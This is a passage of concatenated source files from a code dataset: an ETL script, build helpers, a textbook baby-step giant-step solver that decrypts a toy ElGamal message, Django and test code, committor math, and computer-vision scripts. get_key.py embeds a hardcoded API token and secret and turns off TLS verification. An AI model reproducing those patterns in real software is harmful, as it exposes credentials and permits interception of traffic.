etl_for_range_of_dates(start_date,end_date):\n while (end_date - timedelta(MAX_DELTA)) > start_date:\n interim_start_date = end_date - timedelta(MAX_DELTA)\n print(\"running etl for start_date: %s, end_date: %s\" % (interim_start_date,end_date))\n etl(interim_start_date,end_date)\n end_date = interim_start_date\n if (end_date > start_date):\n print(\"running etl for start_date: %s, end_date: %s\" % (start_date,end_date))\n etl(start_date,end_date)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n u_dw_prod, pw_dw_prod, u_postprocessing, pw_postprocessing = get_secrets()\n parser.add_argument('-username_dw_prod', default = u_dw_prod)\n parser.add_argument('-pw_dw_prod',default = pw_dw_prod)\n parser.add_argument('-u_postprocessing', default= u_postprocessing)\n parser.add_argument('-pw_postprocessing', default = pw_postprocessing)\n parser.add_argument('-start_delta', default = 7, type=int)\n parser.add_argument('-end_date') # format '%Y%m%d'\n parser.add_argument('-start_date')\n parser.add_argument('--no-default_dates', dest='since_last', action='store_false')\n parser.set_defaults(since_last=True)\n options = parser.parse_args()\n #pdb.set_trace()\n print('connecting..')\n my_cluster = pymongo.MongoClient(postprocessing_connection_string(options.u_postprocessing,options.pw_postprocessing),retryWrites = True,socketTimeoutMS = 3600000)\n db = my_cluster.drivers\n internal_collection = db[INTERNAL_TOOLS_COLLECTION]\n external_collection = db[EXTERNAL_APPS_COLLECTION]\n print('deriving dates...')\n if (options.since_last is True):\n start_date,end_date = default_start_end_date(external_collection)\n else:\n start_date,end_date = start_and_end_date(options.end_date,options.start_date)\n print('start date %s , end date %s' % (start_date,end_date))\n print('starting ETL..')\n 
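# back-fill the derived window in MAX_DELTA-day chunks, newest first\n    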
etl_for_range_of_dates(start_date,end_date)\n","sub_path":"scripts/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":17263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"196070466","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom waflib.Configure import conf\nfrom waflib import Options #, Utils\nimport os\n\ndef options(opt):\n    pass\n\n# Check resulting filename for undefined symbols.\n# Environment: TARGET\n@conf\ndef undef_check(bld, filename):\n    bld(\n        source = bld.path.find_or_declare(filename),\n        rule = '%s -u ${SRC[0].abspath()}' % bld.env['NM'],\n        name = 'nm undef check ('+filename+')'\n    )\n\n@conf\ndef setup_module_build(bld, name, prefix, sources):\n    if prefix: prefix = prefix + '/'\n    arch = Options.options.arch\n    platform = Options.options.platform\n\n    mod = bld.program(\n        source = sources,\n        target = name+'.comp',\n        # debug depends on platform\n        # runtime doesn't depend on anything\n        use = 'component_support interfaces kernel cxx debug common platform runtime',\n        env = bld.all_envs['KERNEL_ENV'].derive()\n    )\n    mod.gen_incpaths(prefix+'../')\n    mod.includes.append('.')\n    mod.includes.append(prefix)\n\n    # -Wl,\n    mod.env.append_unique('LINKFLAGS', ['-r']) #, '--error-unresolved-symbols']); # Components are relocatable\n    if platform != 'hosted':\n        mod.env.append_unique('LINKFLAGS', ['-Wl,-T,../modules/component.lds', '-Wl,-Map,'+name+'.map'])\n        bld.undef_check(mod.target)\n    node = bld.path.find_or_declare(mod.target)\n    bld.all_comp_targets += [node.bldpath()]\n    return mod\n","sub_path":"src/waftools/module_template.py","file_name":"module_template.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"648338263","text":"def InverseCalculator(g,p):\n    return fastPower(g,p-2,p)\n\ndef fastPower(g,x,p):\n    a = g\n    b = 1\n    while x>0:\n        if x%2 == 1:\n            b = (b*a)%p\n        a = (a*a)%p\n        x = x//2\n    return b\n\ndef int2bin(integer):\n    binString = ''\n    while integer:\n        if integer % 2 == 1:\n            binString = '1' + binString\n        else:\n            binString = '0' + binString\n        integer //= 2\n    while len(binString)%8 != 0:\n        binString = '0' + binString\n    return binString\n\ndef bin2msg(binary):\n    return ''.join(chr(int(binary[i*8:i*8+8],2)) for i in range(len(binary)//8))\n\ndef int2msg(integer):\n    return bin2msg(int2bin(integer))\n#read information from input.txt\nread=[]\nf=open('input.txt')\nlines = f.readlines()\nfor line in lines:\n    line=line.strip('\\n')\n    read.append(line)\np,g,A,c1,c2=int(read[0]),int(read[1]),int(read[2]),int(read[3]),int(read[4])\n\nlist1=[]\nlist2=[]\ndict1={}\ndict2={}\n\nn=int(p**0.5)+1\ng_inverse=InverseCalculator(g,p)\nsignal=0\ni=0\n\nwhile signal!=1:\n    list1.append(fastPower(g,i,p))\n    list2.append(fastPower(g_inverse,i*n,p)*A%p)\n    dict1[list1[i]]=i\n    dict2[list2[i]]=i\n    if list1[i] in list2:\n        a=i+(dict2[list1[i]])*n\n        signal=1\n    if list2[i] in list1:\n        a=dict1[list2[i]]+i*n\n        signal=1\n    i+=1\n\nnumber=(fastPower(InverseCalculator(c1,p),a,p)*c2)%p\nprint (int2msg(number))","sub_path":"BSGS/Shanks_algorithm.py","file_name":"Shanks_algorithm.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522817862","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass KeyWord(models.Model):\n    keyword = models.CharField(\n        'Keywords', 
max_length=256, primary_key=True, help_text='User sent Keywords')\n content = models.TextField(\n 'Content', null=True, blank=True, help_text='User sent Content ')\n \n pub_date = models.DateTimeField('Published Date', auto_now_add=True)\n update_time = models.DateTimeField('Update Time', auto_now=True, null=True)\n published = models.BooleanField('Published Status', default=True)\n \n def __unicode__(self):\n return self.keyword\n \n class Meta:\n verbose_name='Keywords'\n verbose_name_plural=verbose_name\n","sub_path":"weichat/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537668099","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2014--, The Qiita Development Team.\n#\n# Distributed under the terms of the BSD 3-clause License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# -----------------------------------------------------------------------------\n\nfrom unittest import TestCase, main\nfrom tempfile import mkstemp\nfrom os import close, remove\nfrom os.path import exists, join, dirname, abspath\n\nfrom qiita_core.util import qiita_test_checker\nfrom qiita_ware.dispatchable import (\n create_sample_template, update_sample_template, delete_sample_template,\n update_prep_template, delete_artifact, copy_raw_data, create_raw_data)\nfrom qiita_db.study import Study\nfrom qiita_db.artifact import Artifact\nfrom qiita_db.exceptions import QiitaDBUnknownIDError\nfrom qiita_db.metadata_template.prep_template import PrepTemplate\n\n\n@qiita_test_checker()\nclass TestDispatchable(TestCase):\n def setUp(self):\n fd, self.fp = mkstemp(suffix=\".txt\")\n close(fd)\n with open(self.fp, 'w') as f:\n f.write(\"sample_name\\tnew_col\\n\"\n \"1.SKD6.640190\\tnew_vale\")\n\n self._clean_up_files = [self.fp]\n\n def tearDown(self):\n for fp in self._clean_up_files:\n if exists(fp):\n remove(fp)\n\n def test_create_raw_data(self):\n fps = {'raw_barcodes': 'uploaded_file.txt',\n 'raw_forward_seqs': 'update.txt'}\n obs = create_raw_data(\"FASTQ\", PrepTemplate(1), fps, name=\"New name\")\n exp = {'status': 'danger',\n 'message': \"Error creating artifact: Prep template 1 already \"\n \"has an artifact associated\"}\n self.assertEqual(obs, exp)\n\n def test_copy_raw_data(self):\n obs = copy_raw_data(PrepTemplate(1), 1)\n exp = {'status': 'danger',\n 'message': \"Error creating artifact: Prep template 1 already \"\n \"has an artifact associated\"}\n self.assertEqual(obs, exp)\n\n def test_delete_artifact(self):\n obs = delete_artifact(1)\n exp = {'status': 'danger',\n 'message': 'Cannot delete artifact 1: it has children: 2, 3'}\n self.assertEqual(obs, exp)\n\n obs = delete_artifact(3)\n exp = {'status': 'success',\n 'message': ''}\n self.assertEqual(obs, exp)\n\n with self.assertRaises(QiitaDBUnknownIDError):\n Artifact(3)\n\n def test_create_sample_template(self):\n obs = create_sample_template(self.fp, Study(1), False)\n exp = {'status': 'danger',\n 'message': \"The 'SampleTemplate' object with attributes \"\n \"(id: 1) already exists.\"}\n self.assertEqual(obs, exp)\n\n def test_create_sample_template_nonutf8(self):\n fp = join(dirname(abspath(__file__)), 'test_data',\n 'sample_info_utf8_error.txt')\n obs = create_sample_template(fp, Study(1), False)\n exp = {'status': 'danger',\n 'message': u\"Non UTF-8 characters found in columns:\"\n u\"\\n\\ufffdcollection_timestamp: row(s) 1\"}\n 
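# \ufffd is the Unicode replacement character emitted for bytes that failed to decode\n        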
self.assertEqual(obs, exp)\n\n    def test_update_sample_template(self):\n        obs = update_sample_template(1, self.fp)\n        exp = {'status': 'warning',\n               'message': (\"Sample names were already prefixed with the study \"\n                           \"id.\\nThe following columns have been added to the \"\n                           \"existing template: new_col\\nThere are no \"\n                           \"differences between the data stored in the DB and \"\n                           \"the new data provided\")}\n        self.assertEqual(obs['status'], exp['status'])\n        self.assertItemsEqual(obs['message'].split('\\n'),\n                              exp['message'].split('\\n'))\n\n    def test_delete_sample_template(self):\n        obs = delete_sample_template(1)\n        exp = {'status': 'danger',\n               'message': 'Sample template cannot be erased because there '\n                          'are prep templates associated.'}\n        self.assertEqual(obs, exp)\n\n    def test_update_prep_template(self):\n        obs = update_prep_template(1, self.fp)\n        exp = {'status': 'warning',\n               'message': 'Sample names were already prefixed with the study '\n                          'id.\\nThe following columns have been added to the '\n                          'existing template: new_col\\nThere are no '\n                          'differences between the data stored in the DB and '\n                          'the new data provided'}\n        self.assertEqual(obs['status'], exp['status'])\n        self.assertItemsEqual(obs['message'].split('\\n'),\n                              exp['message'].split('\\n'))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"qiita_ware/test/test_dispatchable.py","file_name":"test_dispatchable.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123472485","text":"\n# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Free University\n# Berlin, 14195 Berlin, Germany.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n#  * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#  * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nr\"\"\"This module provides functions for the computation of forward and\nbackward committors using dense linear algebra.\n\n.. 
moduleauthor:: B.Trendelkamp-Schroer \n\n\"\"\"\nfrom __future__ import absolute_import, division\nfrom six.moves import range\n\nimport numpy as np\nfrom scipy.linalg import solve\n\nfrom .stationary_vector import stationary_distribution_from_backward_iteration as statdist\n\n\ndef forward_committor(T, A, B):\n    r\"\"\"Forward committor between given sets.\n\n    The forward committor u(x) between sets A and B is the probability\n    for the chain starting in x to reach B before reaching A.\n\n    Parameters\n    ----------\n    T : (M, M) ndarray\n        Transition matrix\n    A : array_like\n        List of integer state labels for set A\n    B : array_like\n        List of integer state labels for set B\n\n    Returns\n    -------\n    u : (M, ) ndarray\n        Vector of forward committor probabilities\n\n    Notes\n    -----\n    The forward committor is a solution to the following\n    boundary-value problem\n\n    .. math::\n\n        \\sum_j L_{ij} u_{j}=0    for i in X\\(A u B) (I)\n        u_{i}=0 for i \\in A (II)\n        u_{i}=1 for i \\in B (III)\n\n    with generator matrix L=(P-I).\n\n    \"\"\"\n    X = set(range(T.shape[0]))\n    A = set(A)\n    B = set(B)\n    AB = A.intersection(B)\n    notAB = X.difference(A).difference(B)\n    if len(AB) > 0:\n        raise ValueError(\"Sets A and B have to be disjoint\")\n    L = T - np.eye(T.shape[0])  # Generator matrix\n\n    \"\"\"Assemble left-hand side W for linear system\"\"\"\n    \"\"\"Equation (I)\"\"\"\n    W = 1.0 * L\n    \"\"\"Equation (II)\"\"\"\n    W[list(A), :] = 0.0\n    W[list(A), list(A)] = 1.0\n    \"\"\"Equation (III)\"\"\"\n    W[list(B), :] = 0.0\n    W[list(B), list(B)] = 1.0\n\n    \"\"\"Assemble right-hand side r for linear system\"\"\"\n    \"\"\"Equation (I+II)\"\"\"\n    r = np.zeros(T.shape[0])\n    \"\"\"Equation (III)\"\"\"\n    r[list(B)] = 1.0\n\n    u = solve(W, r)\n    return u\n\n\ndef backward_committor(T, A, B, mu=None):\n    r\"\"\"Backward committor between given sets.\n\n    The backward committor u(x) between sets A and B is the\n    probability for the chain starting in x to have come from A last\n    rather than from B.\n\n    Parameters\n    ----------\n    T : (M, M) ndarray\n        Transition matrix\n    A : array_like\n        List of integer state labels for set A\n    B : array_like\n        List of integer state labels for set B\n    mu : (M, ) ndarray (optional)\n        Stationary vector\n\n    Returns\n    -------\n    u : (M, ) ndarray\n        Vector of backward committor probabilities\n\n    Notes\n    -----\n    The backward committor is a solution to the following\n    boundary-value problem\n\n    .. 
math::\n\n \\sum_j K_{ij} \\pi_{j} u_{j}=0 for i in X\\(A u B) (I)\n u_{i}=1 for i \\in A (II)\n u_{i}=0 for i \\in B (III)\n\n with adjoint of the generator matrix K=(D_pi(P-I))'.\n\n \"\"\"\n X = set(range(T.shape[0]))\n A = set(A)\n B = set(B)\n AB = A.intersection(B)\n notAB = X.difference(A).difference(B)\n if len(AB) > 0:\n raise ValueError(\"Sets A and B have to be disjoint\")\n if mu is None:\n mu = statdist(T)\n K = np.transpose(mu[:, np.newaxis] * (T - np.eye(T.shape[0])))\n\n \"\"\"Assemble left-hand side W for linear system\"\"\"\n \"\"\"Equation (I)\"\"\"\n W = 1.0 * K\n \"\"\"Equation (II)\"\"\"\n W[list(A), :] = 0.0\n W[list(A), list(A)] = 1.0\n \"\"\"Equation (III)\"\"\"\n W[list(B), :] = 0.0\n W[list(B), list(B)] = 1.0\n\n \"\"\"Assemble right-hand side r for linear system\"\"\"\n \"\"\"Equation (I)+(III)\"\"\"\n r = np.zeros(T.shape[0])\n \"\"\"Equation (II)\"\"\"\n r[list(A)] = 1.0\n\n u = solve(W, r)\n\n return u\n","sub_path":"msmtools/analysis/dense/committor.py","file_name":"committor.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227182497","text":"import sys, json, requests, time, uuid, hmac, hashlib, base64\nBASE_URL = 'https://localhost:9700'\nAPI_TOKEN = 'LIKUuWpU4BBU3ax52CxXB9iwezRcLG1m'\nAPI_SECRET = 'AtzpTcEeFdVqRRDiMIrqrsinFv20NrWu'\n\ndef auth_request(method, path, headers=None, data=None):\n auth_timestamp = str(int(time.time()))\n auth_nonce = uuid.uuid4().hex\n auth_string = '&'.join([API_TOKEN, auth_timestamp, auth_nonce,\n method.upper(), path] + ([data] if data else []))\n # hmac needs bytes in Python 3, so encode the key and the message\n auth_signature = base64.b64encode(hmac.new(\n API_SECRET.encode(), auth_string.encode(), hashlib.sha256).digest())\n auth_headers = {\n 'Auth-Token': API_TOKEN,\n 'Auth-Timestamp': auth_timestamp,\n 'Auth-Nonce': auth_nonce,\n 'Auth-Signature': auth_signature,\n }\n if headers:\n auth_headers.update(headers)\n return getattr(requests, method.lower())(\n BASE_URL + path,\n verify=False,\n headers=auth_headers,\n data=data,\n)\n\nresponse = auth_request('GET','/user/54c079837fa0572d1ed6946d',)\nemail = sys.argv[1]\nassert response.status_code == 200\nuser_type = 'client' # renamed from 'type' to avoid shadowing the built-in\ndata = response.json()\n\nfor value in data:\n\tif value['type'] == user_type and value['email'] == email:\n\t\tresponse = auth_request('GET','/key/54c079837fa0572d1ed6946d/'+ value['id'],)\n\t\tresp = response.json()\n","sub_path":"get_key.py","file_name":"get_key.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74252245","text":"## read the parameters\n\n## process\n\n## return the data frame\n\nimport os\nimport yaml\nimport pandas as pd\nimport argparse\n\n\n# checking\n\ndef read_params(config_path):\n with open(config_path) as f:\n config = yaml.safe_load(f)\n return config\n\n\ndef get_base_dir():\n base = os.getcwd()\n base = base[::-1]\n idx = base.find(\"\\\\\")\n base = base[idx:]\n base = base[::-1]\n return base\n\n\ndef get_data(config_path):\n config = read_params(config_path)\n data_path = config[\"data_source\"][\"s3_source\"]\n # base=get_base_dir()\n df = pd.read_csv(os.path.join(data_path))\n print(df.head())\n return df\n\n\nif __name__ == \"__main__\":\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", default=\"params.yaml\")\n parsed_args = args.parse_args()\n 
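A quick sanity check for the committor solver defined in the committor.py record above; the 3-state transition matrix is made up for illustration, and `forward_committor` is assumed importable from that module.

```python
# Tiny 3-state chain with A = {0} and B = {2}: the middle state leaves to
# either neighbour with equal probability, so its committor should be 0.5.
import numpy as np

T = np.array([[0.8, 0.2, 0.0],
              [0.1, 0.8, 0.1],
              [0.0, 0.2, 0.8]])
u = forward_committor(T, A=[0], B=[2])  # assumes the function above is in scope
# Boundary conditions pin u[0] = 0 and u[2] = 1; the linear solve fills in
# the interior state.
print(u)  # -> [0.  0.5 1. ]
```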
get_data(parsed_args.config)\n","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"463568000","text":"#!/usr/bin/python3\n\nimport xml.etree.ElementTree as ET\n\nprint('Fetching info from xml...', end='\\r')\nresult_list = list()\ntree = ET.parse('../data/Deputados.xml')\nroot = tree.getroot()[0]\n\nfor congressman in root:\n if congressman[1].text == '54' and congressman[7].text == 'Efetivado':\n result_list.append(congressman[2].text)\nprint('Fetching data from xml... Done')\n\nprint('List of congressman:')\nfor congressman in result_list:\n print(congressman)\n","sub_path":"src/find_holders.py","file_name":"find_holders.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"330508678","text":"import sys\nimport time\nimport operator\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\n\nfrom Trainer import *\nfrom config import *\nfrom Sampler import *\n\n# Recognising is the third stage of the program\n# It creates a recogniser\n# Trains it with the classified emotions from the data set\n# Then predict the current emotion in the video\n\nclass Recognizer(object):\n\n def __init__(self, threshold=THRESHOLD, retrain_flag=True, recogniser='Fisher'):\n self._emotion_dictionary = emotions\n self._face_cascade = cv2.CascadeClassifier(CASCADE_FACE)\n self._mouth_cascade = cv2.CascadeClassifier(CASCADE_MOUTH)\n self._threshold = threshold\n self._retrain_flag = retrain_flag\n self._trainer = Trainer(recogniser)\n self._sampler = Sampler()\n\n def __call__(self):\n # Prediction on Video\n recogniser = self._trainer.get_recognizer(self._retrain_flag)\n capture = cv2.VideoCapture(0)\n start = time.time()\n time.clock()\n disp_major_emotion = []\n disp_minor_emotion = []\n cache = list(dict())\n cache_emop = []\n\n logging.info(cache)\n\n while True:\n ret, color_frame = capture.read()\n results = self._sampler.extract(color_frame)\n\n for i, (gray_resize, x, y) in enumerate(results):\n prediction, confidence = recogniser.predict(gray_resize)\n emotion = self._emotion_dictionary[prediction]\n\n # Added multiple user record space for their emotion\n while len(disp_major_emotion) <= i:\n disp_major_emotion.append('neutral')\n disp_minor_emotion.append('')\n\n # Added multiple user emotion cache\n while len(cache) <= i:\n cache.append({'neutral': 0})\n\n # Display emotion every second\n if time.time() - start >= 1:\n if i == 0:\n cache_emop = []\n\n logging.info('cache has %s', cache)\n # Fetch Emotion Ranking\n sorted_emotion = sorted(cache[i].items(), key=operator.itemgetter(1), reverse=True)\n var_emotion = np.var(cache[i].values())\n\n # Check if the emotion can be recognised or not\n if var_emotion >= THRESHOLD or var_emotion == 0:\n disp_major_emotion[i] = sorted_emotion[0][0]\n else:\n disp_major_emotion[i] = '???'\n\n # Check if the minor emotion should be the major guess\n if var_emotion < THRESHOLD and var_emotion != 0:\n disp_minor_emotion[i] = sorted_emotion[0][0] + '?'\n elif len(sorted_emotion) > 1 and sorted_emotion[1][1] > 0:\n disp_minor_emotion[i] = sorted_emotion[1][0] + '?'\n else:\n disp_minor_emotion[i] = ''\n\n major_text_color = (0, 0, 255)\n minor_text_color = (50, 50, 150)\n text_font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(color_frame, str(disp_major_emotion[i]), (x, y), text_font, 1, major_text_color, 3)\n 
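The find_holders.py record above selects congressman names from `Deputados.xml` purely by positional child indices; a stand-alone sketch of that pattern (indices 1, 2 and 7 and the literals '54'/'Efetivado' are taken from the script, the field meanings are my reading, not stated in the source):

```python
import xml.etree.ElementTree as ET

root = ET.parse('../data/Deputados.xml').getroot()[0]
# the script treats child 1 as the legislature ('54'), child 2 as the
# name, and child 7 as the status ('Efetivado')
holders = [dep[2].text for dep in root
           if dep[1].text == '54' and dep[7].text == 'Efetivado']
print('\n'.join(holders))
```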
cv2.putText(color_frame, str(disp_minor_emotion[i]), (x, y - 40), text_font, 0.8, minor_text_color, 2)\n\n if i == len(results) - 1:\n cache = list(dict())\n\n start = time.time()\n else:\n # print \"pic %s analysis Emotion: %10s | Confidence: %10f\" % (i, disp_emotion[i], confidence)\n if cache[i].get(emotion, None) is None:\n cache[i][emotion] = pow((16000 - confidence) // 1000, 2)\n else:\n cache[i][emotion] += pow((16000 - confidence) // 1000, 2)\n\n # redraw the labels at each face's own coordinates instead of reusing\n # the stale (x, y) left over from the loop above\n for i, (gray_resize, x, y) in enumerate(results):\n major_text_color = (0, 0, 255)\n minor_text_color = (50, 50, 150)\n text_font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(color_frame, str(disp_major_emotion[i]), (x, y), text_font, 1, major_text_color, 3)\n cv2.putText(color_frame, str(disp_minor_emotion[i]), (x, y - 40), text_font, 0.8, minor_text_color, 2)\n\n cv2.imshow('face', color_frame)\n k = cv2.waitKey(10) & 0xff\n if k == 27:\n capture.release()\n cv2.destroyAllWindows()\n return 0\n\nif __name__ == '__main__':\n # rt_flag = False\n rt_flag = False\n if len(sys.argv) == 2:\n rt_flag = False if sys.argv[1] == '0' else True\n\n rec = Recognizer(recogniser='Eigen', retrain_flag=rt_flag)\n rec()\n","sub_path":"Recogniser.py","file_name":"Recogniser.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"431930950","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 14 04:49:06 2020\n\n@author: Dr~Newt\n\"\"\"\nimport numpy as np\nimport cv2\nimport math\nimport glob\nfrom utils5.camera_calib import Camera_Calib\n\nclass ImageFilters():\n # Initialize ImageFilter\n def __init__(self, cam_Calib, debug=False):\n self.current_Frame = None\n # returns a copy of the camera calibration data\n self.mtx, self.dist, self.img_size = cam_Calib.get()\n # normal image size\n self.x, self.y = self.img_size\n self.mid = int(self.y / 2)\n # current Image RGB - undistorted\n self.current_Image = np.zeros((self.y, self.x, 3), dtype=np.float32)\n # current Image Top half RGB\n self.current_SkyRGB = np.zeros((self.mid, self.x, 3), dtype=np.float32)\n # current Image Bottom half RGB\n self.current_RoadRGB = np.zeros((self.mid, self.x, 3), dtype=np.float32)\n # current Sky Luma Image\n self.current_SkyL = np.zeros((self.mid, self.x), dtype=np.float32)\n # current Road Luma Image\n self.current_RoadL = np.zeros((self.mid, self.x), dtype=np.float32)\n \n # current Edge (Left Only)\n self.current_Road_L_Edge = np.zeros((self.mid, self.x), dtype=np.uint8)\n self.curRoadLEdgeProjected = np.zeros((self.y, self.x, 3), dtype=np.uint8)\n \n self.debug = debug\n \n self.skylrgb = np.zeros((4), dtype=np.float32)\n self.roadlrgb = np.zeros((4), dtype=np.float32)\n self.roadbalance = 0.0\n self.horizonFound = False\n self.roadhorizon = 0\n self.visibility = 0\n \n\n # Textural Image Info\n self.skyText = 'NOIMAGE'\n self.skyImageQ = 'NOIMAGE'\n self.roadText = 'NOIMAGE'\n self.roadImageQ = 'NOIMAGE'\n \n def dir_sobel(self, gray_img, kernel_size=3, thres=(0, np.pi/2)):\n \"\"\"\n Computes sobel matrix in both x and y directions, gets their absolute values to find the direction of the gradient\n and applies a threshold value to only set pixels within the specified range\n \"\"\"\n sx_abs = np.absolute(cv2.Sobel(gray_img, cv2.CV_64F, 1, 0, ksize=kernel_size))\n sy_abs = np.absolute(cv2.Sobel(gray_img, cv2.CV_64F, 0, 1, ksize=kernel_size))\n \n dir_sxy = np.arctan2(sx_abs, sy_abs)\n \n binary_output = np.zeros_like(dir_sxy)\n binary_output[(dir_sxy >= thres[0]) & (dir_sxy <= 
thres[1])] = 1\n \n return binary_output\n \n \n def abs_sobel(self,gray_img, x_dir=True, kernel_size=3, thres=(0, 255)):\n \"\"\"\n Applies the sobel operator to a grayscale-like (i.e. single channel) image in either horizontal or vertical direction\n The function also computes the asbolute value of the resulting matrix and applies a binary threshold\n \"\"\"\n sobel = cv2.Sobel(gray_img, cv2.CV_64F, 1, 0, ksize=kernel_size) if x_dir else cv2.Sobel(gray_img, cv2.CV_64F, 0, 1, ksize=kernel_size) \n sobel_abs = np.absolute(sobel)\n sobel_scaled = np.uint8(255 * sobel / np.max(sobel_abs))\n \n gradient_mask = np.zeros_like(sobel_scaled)\n gradient_mask[(thres[0] <= sobel_scaled) & (sobel_scaled <= thres[1])] = 1\n return gradient_mask\n \n \n def to_hls(self,img):\n #Returns the same image in HLS format\n return cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n \n def compute_hls_white_yellow_binary(self,rgb_img):\n #Returns a binary thresholded image produced retaining only white and yellow elements \n hls_img = self.to_hls(rgb_img)\n \n # Compute a binary thresholded image where yellow is isolated from HLS components\n img_hls_yellow_bin = np.zeros_like(hls_img[:,:,0])\n img_hls_yellow_bin[((hls_img[:,:,0] >= 15) & (hls_img[:,:,0] <= 35))\n & ((hls_img[:,:,1] >= 30) & (hls_img[:,:,1] <= 204))\n & ((hls_img[:,:,2] >= 115) & (hls_img[:,:,2] <= 255)) \n ] = 1\n \n # Compute a binary thresholded image where white is isolated from HLS components\n img_hls_white_bin = np.zeros_like(hls_img[:,:,0])\n img_hls_white_bin[((hls_img[:,:,0] >= 0) & (hls_img[:,:,0] <= 255))\n & ((hls_img[:,:,1] >= 200) & (hls_img[:,:,1] <= 255))\n & ((hls_img[:,:,2] >= 0) & (hls_img[:,:,2] <= 255)) \n ] = 1\n \n # Now combine both\n img_hls_white_yellow_bin = np.zeros_like(hls_img[:,:,0])\n img_hls_white_yellow_bin[(img_hls_yellow_bin == 1) | (img_hls_white_bin == 1)] = 1\n \n return img_hls_white_yellow_bin\n \n def mag_sobel(self,gray_img, kernel_size=3, thres=(0, 255)):\n #Computes sobel matrix in both x and y directions, merges them by computing the magnitude in both directions\n #and applies a threshold value to only set pixels within the specified range\n sx = cv2.Sobel(gray_img, cv2.CV_64F, 1, 0, ksize=kernel_size)\n sy = cv2.Sobel(gray_img, cv2.CV_64F, 0, 1, ksize=kernel_size)\n \n sxy = np.sqrt(np.square(sx) + np.square(sy))\n scaled_sxy = np.uint8(255 * sxy / np.max(sxy))\n \n sxy_binary = np.zeros_like(scaled_sxy)\n sxy_binary[(scaled_sxy >= thres[0]) & (scaled_sxy <= thres[1])] = 1\n \n return sxy_binary\n \n \n \n def combined_sobels(self,sx_binary, sy_binary, sxy_magnitude_binary, gray_img, kernel_size=3, angle_thres=(0, np.pi/2)):\n\n sxy_direction_binary = self.dir_sobel(gray_img, kernel_size=kernel_size, thres=angle_thres)\n\n combined = np.zeros_like(sxy_direction_binary)\n # Sobel X returned the best output so we keep all of its results. 
